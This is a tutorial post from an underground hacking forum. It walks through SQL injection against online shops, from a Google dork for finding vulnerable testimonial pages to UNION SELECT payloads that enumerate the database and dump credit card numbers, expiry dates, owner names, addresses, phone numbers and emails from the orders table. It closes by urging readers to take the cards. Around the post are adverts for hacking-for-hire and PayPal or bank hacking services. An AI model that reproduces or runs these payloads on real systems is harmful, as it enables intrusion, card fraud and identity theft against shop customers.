For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Webshop Hacking Tut
#1
Hot 
Webshop Hacking
1) we got to search google for webshops , I used this dork :


CODE:
inurl:customer_testimonials.php testimonial_id=
2)lets say we got this site 
CODE:
http://www.JustExample.com/customer_...stimonial_id=7
3) we got to check if its vulnerable to SQLi , we add this 
CODE:
'
to url :


>>>
CODE:
http://www.JustExample.com/customer_...stimonial_id=7'
if we get a error means website its vuln.


4) we have to check for column number we try with 10 first 
CODE:
+order+by+10-


- :


>>>




CODE:
http://www.JustExample.com/customer_...+order+by+10--






if we dont get a error means the website has more then 10 columns , if we get a error means the website has less then 10 columns


5 )this time we get a error now we try from 1 to 9 




CODE:
+union+select+1,2,3,4,5,6,7,8,9--




>>>




CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--




now we found it the website has 9 columns


6) most of time we can get infos from table 3 and 6 , lets say now we can from 3 xD , now we can get database user , database name and database version in this way :


*- database user


CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


*- database name


CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


*- database version


CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


7) we need the table names we add this to url :


CODE:
+union+select+1,2,table_name,4,5,6,7,8,9+from+info rmation_schema.tables--






CODE:
http://www.JustExample.com/customer_...chema.tables--




8 ) now we need columns : we add this to url :




CODE:
+union+select+1,2,concat(table_name,char(58),colum n_name),4,5,6,7,8,9+from+information_schema.column s--


>>>


CODE:
http://www.JustExample.com/customer_...hema.columns--
9) now all we got to do is view the orders and customers infos (there are the credit cards xD) : if we add this to url we will get credit card numbers , payment method , credit card type ......




CODE:
+union+select+1,2,concat(payment_method,char(58),c c_type,char(58),cc_number,char(58),cc_expires),4,5 ,6,7,8,9fromorders--




>>>




CODE:
http://www.JustExample.com/customer_...+from+orders--




if we add this to url we will get many infos about costumers , address , phone number , e-mails , zip code , and the credit card infos all of them




CODE:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x 2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,cu stomers_street_address,0x2F,customers_suburb,0x2F, customers_city,0x2F,customers_postcode,0x2F,custom ers_state,0x2F,customers_country,0x2F,customers_te lephone,0x2F,customers_email_address,0x2F,date_pur chased),4,5,6,7,8,9+from+orders+




>>>




CODE:
http://www.JustExample.com
/customer_testimonials.php?&testimonial_id=7+union+ select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_o wner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers _street_address,0x2F,customers_suburb,0x2F,custome rs_city,0x2F,customers_postcode,0x2F,customers_sta te,0x2F,customers_country,0x2F,customers_telephone ,0x2F,customers_email_address,0x2F,date_purchased) ,4,5,6,7,8,9+from+orders+




now one step left


10 ) get the credit cards and have fun

Swift for inquiries
 Contact;

Skype ID: secureworks0093

Discord ID: secureworks0093#4356

Official ICQ: 719126463

Whatsapp: +1 (806)-(680)-6090

Email: secureworks0093@gmail.com

https://www.youtube.com/user/secureworks/featured
Reply
For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp
 


Possibly Related Threads...
Thread Author Replies Views Last Post
Hot [Selling] How to hack PayPal Accounts see||Hackin Tutorails||Hacking Services!! mayson-cumanuallyo 0 8 Yesterday, 02:41 PM
Last Post: mayson-cumanuallyo
  PayPal Transfer Very Fast Worldwide including MoneyGram and Fullz. I Teach Hacking!!! morrismutes 0 10 Yesterday, 02:35 PM
Last Post: morrismutes
Hot hacking services for hire ww.processingdept 0 9 Yesterday, 02:16 PM
Last Post: ww.processingdept
Hot reliable and trusted hacking services and hacking Classes ww.processingdept 0 10 Yesterday, 02:11 PM
Last Post: ww.processingdept
Hot Bank Hacking AND Credit Card Hacking in Details ww.processingdept 0 8 Yesterday, 01:55 PM
Last Post: ww.processingdept
Hot My Hacking Services: Brute Forcing Cracking Encrypting Doxing DoS attacks projecthackers 0 14 11-12-2018, 11:54 PM
Last Post: projecthackers
  [Tutorial] FRESH HACKING TOOLS Max gary 0 19 11-12-2018, 04:05 PM
Last Post: Max gary
Hot CYBER SECURITY EXPERT AND TRUSTED HACKING SERVICES effecthacking 0 19 11-12-2018, 03:24 AM
Last Post: effecthacking
Hot Service of Hacking ghss.dvr 0 15 11-11-2018, 10:56 PM
Last Post: ghss.dvr
Hot PRO HACKING SERVICES !!! (SOLVE YOUR HACKING PROBLEMS ) melindaekins 0 20 11-11-2018, 02:23 PM
Last Post: melindaekins

Forum Jump:


Users browsing this thread: 1 Guest(s)
For Support and Advertisement you can contact  701491310 c0defire@xmpp.jp

About Offensive Community

Offensive Community is a world best underground hacking forum that provides tutorials, latest hacking techniques, free tools and a great online teaching to our members. Join the forum Now.

Feel free to join our community.